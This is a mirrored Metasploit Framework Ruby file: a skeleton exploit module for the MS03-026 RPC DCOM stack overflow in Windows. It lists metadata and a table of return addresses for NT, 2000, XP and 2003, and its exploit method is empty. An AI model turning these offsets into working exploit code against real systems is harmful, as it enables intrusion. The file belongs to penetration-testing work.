mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-18 14:00:12 +02:00
57 lines
1.5 KiB
Ruby
57 lines
1.5 KiB
Ruby
require 'msf/core'
|
|
|
|
module Msf
|
|
|
|
class Exploit::Remote::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
|
|
|
|
#
|
|
# This module exploits a vulnerability in a DCERPC service
|
|
#
|
|
include Exploit::Remote::DCERPC
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Microsoft RPC DCOM MSO3-026',
|
|
'Description' =>
|
|
"This module exploits a stack overflow in the RPCSS service, this vulnerability" +
|
|
"was originally found by the Last Stage of Delirium research group and has been" +
|
|
"widely exploited ever since. This module can exploit the English versions of " +
|
|
"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
|
|
'Author' => [ 'hdm', 'spoonm' ],
|
|
'Version' => '$Revision$',
|
|
'Refs' =>
|
|
[
|
|
[ 'OSVDB', '2100' ],
|
|
[ 'MSB', 'MS03-026' ],
|
|
],
|
|
'Privileged' => true,
|
|
'Targets' =>
|
|
[
|
|
# Target 0: Universal
|
|
[
|
|
'Windows NT SP3-6a/2000/XP/2003 Universal',
|
|
{
|
|
'Platform' => 'win',
|
|
'Rets' =>
|
|
[
|
|
0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
|
|
0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
|
|
0x77f33723, # Windows NT 4.0 SP6a (esp)
|
|
0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
|
|
0x0018759f, # Windows 2000 Universal (ebx)
|
|
0x01001c59, # Windows XP | XP SP0/SP1 (pop/pop/ret)
|
|
0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)
|
|
],
|
|
},
|
|
],
|
|
],
|
|
'DefaultTarget' => 0)
|
|
end
|
|
|
|
def exploit
|
|
end
|
|
|
|
end
|
|
|
|
end
|